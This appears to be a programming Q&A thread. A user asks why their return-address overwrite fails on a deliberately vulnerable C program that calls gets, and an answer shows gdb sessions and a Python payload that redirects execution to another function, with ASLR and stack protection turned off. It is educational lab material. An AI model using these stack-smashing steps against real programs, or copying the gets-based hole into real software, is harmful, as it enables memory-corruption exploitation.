# ROP faild on linux even when ASLR and stack compiler protector are disabled

Tags: c, linux, aslr, buffer-overrun

I tern off the ASLR and tern of the gcc stack protector.

And I wrote C vulnerable code and I tried to overflow the buffer so I check how many character need for the crash.  And I tried to change the return address , to another function but I got a message:

```
Segmentation fault (core dumped)
```

This is my C code:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>



void sss()
{
  printf("good by");
}


void scriptpy(){
   printf("hello world\n");
}



int main(int argc , char** argv)
{
  char buf[4];
  gets(buf);
  return 0;
}
```

I found the address of the "sss" function
and i tried to insert the hex value .

This is my address:

```
(gdb) disas sss
 Dump of assembler code for function sss:
   0x00000000000006ca <+0>: push   %rbp
```

To edit the return address i insert:

```
printf "AAAABBBBB/xe2/x06/x00/x00/x00/x00/x00/x00" | ./cTutorial
```

Answer (score 3):

Let's suppose that the binary is compiled with the flag `-fno-stack-protector` and the ASLR is disabled `echo 0 | sudo tee /proc/sys/kernel/randomize_va_space`.

### Find the crash:

The program start crashing with payload of 12 characters:

```
$ python3 -c "print('A' * 12)" | ./cTutorial
Segmentation fault (core dumped)
```

### Controlling RIP

Using GDB to find the offset that overwrite RIP, we can find that the first byte of RIP can be overwritten with 0x41 ('A') with a payload of 13 characters:

```
$ gdb -q cTutorial
Reading symbols from cTutorial...
(No debugging symbols found in cTutorial)
(gdb) r <<<$(python3 -c "print('A' * 13)")
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7de0041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
```

Note that RIP is overwritten with **0041** where `00` is the null characters terminating the string.

To control all bytes of RIP:

```
(gdb) r <<<$(python3 -c "print('A' * 18)")
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
```

Let's suppose that the function `sss` is located at the address `0x0000555555555189`.

The final payload is:

```
(gdb) b sss
(gdb) r <<<$(python3 -c "print('A' * 11 + '\x89\x51\x55\x55\x55\x55')")
breakpoint 1, 0x0000555555555189 in sss ()
```

Where 11 = 18 - (len('\x89\x51\x55\x55\x55\x55') + 1)
**+1 for the null byte**

The jump to the function `sss` is taken. The program will crash after the jump to the function `sss` as the stack will be corrupted.

Comment: thanks for you'r help . But i tried you'r way and i got the same result. maybe i missed something or didn't understand.

Comment: Can you please post your payload/exploit ?